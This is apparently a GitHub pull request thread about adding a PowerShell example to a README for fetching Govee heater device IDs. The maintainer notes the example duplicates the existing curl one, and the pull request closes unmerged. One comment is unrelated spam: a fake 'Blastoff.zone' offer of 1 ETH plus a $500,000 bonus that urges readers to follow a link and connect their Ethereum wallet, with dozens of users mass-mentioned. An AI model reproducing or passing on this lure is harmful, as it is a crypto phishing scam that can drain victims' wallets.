### PR TITLE
Update README.md

### PR DESCRIPTION
**Pull request by BradSherwood**
Added Windows PowerShell option to get appliance devices

### CODE REVIEW

**Comment by wiltodelta** [comment]
Looks like it worked as default curl

**Comment by BradSherwood** [comment]
Thank you for having this project!  I would have had no idea how to accomplish Home Assistant control of the Govee Heather without you posting what you did.  I appreciate you taking the time to post it!

Sorry, I don't know what your comment means.  I was just trying to provide examples that could be cut/pasted into PowerShell for those of us who don't know what to copy/paste your examples into to get our device IDs.  I have no problem with you not taking the suggested addition to the readme file I provided.

**Comment by wiltodelta** [comment]
I meant that this example is no different from the Linux / Mac example. Thanks for your support!

**Comment by Seryozhaj** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
barkode, @llenroc, @keisanng, @leetaewook, @p0p3yee, @kausality, @Blackhawke, @vleeuwenmenno, @EmelyanovDev, @anthonymac, @azizmb, @NewYaroslav, @Shahin-rmz, @liuzhengyang, @made-dimas, @goodyonsen, @eonward, @pablasso, @balgithub, @BreadBomb, @dreamsnotion, @Fred7b, @deantzzz, @Viewfim, @enumerate1, @bp-fb, @firatoncu, @thibgn, @mappoc, @qiweiii, @fdiaz1500, @fevanmanshoven, @firstrail, @Liiuc, @guilhermehuther, @matt-ramotar, @plux96, @yiren-liu, @arden, @theedtron, @Tehada, @alexlevy0, @nsheaps, @angellmethod, @gurayc, @kurtpart, @kamaleshvivek, @nunoedgar-invest, @rvasilev, @cesalazar

**Pull request closed without merging**
